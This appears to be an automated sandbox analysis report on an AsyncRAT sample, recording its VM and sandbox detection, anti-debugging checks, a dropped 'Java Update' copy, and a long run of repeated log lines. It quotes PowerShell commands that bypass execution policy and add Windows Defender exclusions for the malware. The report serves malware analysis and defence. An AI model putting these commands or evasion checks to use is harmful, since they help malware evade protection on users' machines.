Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 03VPFXH490.exe, type: SAMPLE
Source: Yara match	File source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 03VPFXH490.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\03VPFXH490.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 03VPFXH490.exe, 00000000.00000002.2941379266.0000000002E41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 03VPFXH490.exe, Java Update (32bit).exe.0.dr	Binary or memory string: SBIEDLL.DLLINFO

Source: C:\Users\user\Desktop\03VPFXH490.exe	Memory allocated: F90000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Memory allocated: 1AE40000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\03VPFXH490.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\03VPFXH490.exe	Window / User API: threadDelayed 9796	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6348	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3447	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7448	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2141	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7463	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2194	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7658
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1988

Source: C:\Users\user\Desktop\03VPFXH490.exe TID: 6700	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep count: 7448 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep count: 2141 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044	Thread sleep count: 7463 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep count: 2194 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692	Thread sleep count: 7658 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416	Thread sleep count: 1988 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep time: -4611686018427385s >= -30000s

Source: C:\Users\user\Desktop\03VPFXH490.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\03VPFXH490.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_919e9136cc8d4791\gdiplus.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\SYSTEM32\MSVFW32.dll	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_919e9136cc8d4791	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.mui	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.mui	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	File opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.mui	Jump to behavior

Source: Java Update (32bit).exe.0.dr	Binary or memory string: vmware
Source: 03VPFXH490.exe, 00000000.00000002.2978470207.000000001BD7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\03VPFXH490.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\03VPFXH490.exe

Code function: 0_2_00007FFD9BAD6E61 CheckRemoteDebuggerPresent,

0_2_00007FFD9BAD6E61

Source: C:\Users\user\Desktop\03VPFXH490.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\03VPFXH490.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\03VPFXH490.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe'
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe'	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\03VPFXH490.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe'

Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe'	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '03VPFXH490.exe'	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'	Jump to behavior

Source: C:\Users\user\Desktop\03VPFXH490.exe	Queries volume information: C:\Users\user\Desktop\03VPFXH490.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
